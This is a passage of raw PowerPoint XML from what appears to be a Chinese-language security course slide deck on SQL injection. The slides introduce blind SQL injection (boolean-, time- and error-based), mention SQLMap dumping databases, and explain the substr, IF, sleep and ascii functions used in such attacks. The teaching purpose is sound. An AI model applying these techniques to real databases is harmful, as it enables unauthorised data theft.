                    <a:pt x="358892" y="293749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358892" y="358724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368378" y="358724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368378" y="370912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358892" y="370912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358892" y="401265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375609" y="401265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375609" y="413453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358892" y="413453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358892" y="531760"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="359748" y="531838"/>
                    <a:pt x="360525" y="531993"/>
                    <a:pt x="361303" y="531993"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="545259" y="531993"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="554433" y="531993"/>
                    <a:pt x="561975" y="524463"/>
                    <a:pt x="561975" y="515303"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="561975" y="89661"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="561975" y="80424"/>
                    <a:pt x="554433" y="72971"/>
                    <a:pt x="545259" y="72971"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="358892" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="358892" y="50847"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="359748" y="50769"/>
                    <a:pt x="360525" y="50692"/>
                    <a:pt x="361303" y="50692"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="545259" y="50692"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="566717" y="50692"/>
                    <a:pt x="584211" y="68158"/>
                    <a:pt x="584211" y="89661"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="584211" y="515303"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="584211" y="536728"/>
                    <a:pt x="566717" y="554195"/>
                    <a:pt x="545259" y="554195"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="361303" y="554195"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="360525" y="554195"/>
                    <a:pt x="359748" y="554195"/>
                    <a:pt x="358892" y="554117"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="358892" y="606439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="557378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="47819"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="矩形: 圆角 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93A24122-CA80-4CD4-99F1-04B964979DD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5533877" y="5277751"/>
            <a:ext cx="5400600" cy="702773"/>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DML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用于对数据库进行查询或更新 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2936906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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>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par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="after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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="39"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="29" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="30" presetID="22" presetClass="entr" presetSubtype="8"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left)">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="37" fill="hold">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left)">
                                      <p:cBhvr>
                                        <p:cTn id="4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8" grpId="0" animBg="1"/>
      <p:bldP spid="39" grpId="0" animBg="1"/>
      <p:bldP spid="4" grpId="0" animBg="1"/>
      <p:bldP spid="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99E241B-4002-4B98-89C1-8A6F31F8AFDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="596727" y="875216"/>
            <a:ext cx="2448272" cy="508861"/>
            <a:chOff x="1420106" y="1402730"/>
            <a:chExt cx="2448272"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2532843" y="864088"/>
              <a:ext cx="508859" cy="1586145"/>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2053958" y="1402731"/>
              <a:ext cx="1814420"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en-US" altLang="zh-CN"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SQL</a:t>
              </a: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盲注</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3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1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="文本框 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2C57A0D-0707-41A0-98AF-CC5988247A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100783" y="1453648"/>
            <a:ext cx="10657184" cy="2395544"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">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上面的实验已经证明了</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注入的危害性，通过工具</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SQLMap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可以轻松的获取数据库的所有表、列和数据，读者可能也有疑惑，它是如何达到目的的呢？</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50000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>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有一些</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注入可以将</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执行的结果回显，这种情况下，可以直接通过回显的结果来显示想要查询的各类信息。</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50000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>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但是，实际情况中，具有回显的注入点非常罕见。在这种情况下就需要利用</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盲注。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028775" y="4048373"/>
            <a:ext cx="10932750" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>盲注是不能通过直接显示的途径来获取数据库数据的方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。在盲注中，攻击者根据其返回页面的不同来判断信息（可能是页面内容的不同，也可以是响应时间不同）。一般情况下，盲注可分为三类：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基于布尔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>盲注、基于时间的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>盲注、基于报错的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>盲注</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="442524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5202512" y="837929"/>
            <a:ext cx="2453727" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727"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428143" y="837929"/>
              <a:ext cx="2002471"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常用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SQL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函数</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1244799" y="1672109"/>
            <a:ext cx="10873208" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的用法：取得字符串中指定起始位置和长度的字符串，默认是从起始位置到结束的子串。语法为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>substr( string, start_position, [ length ] )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>substr('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>目标字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>开始位置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>长度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，再如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>substr('This is a test', 6, 2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>将返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 'is'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的用法：如果满足一个条件可以赋一个需要的值。语法：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IF(expr1,expr2,expr3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，其中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>expr1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>是判断条件，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>expr2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>expr3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>是符合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>expr1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的自定义的返回结果，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>expr1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>为真则返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>expr2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，否则返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>expr3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的用法：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sleep(n)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>让语句停留</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>秒时间，然后返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，如果执行被打断，返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
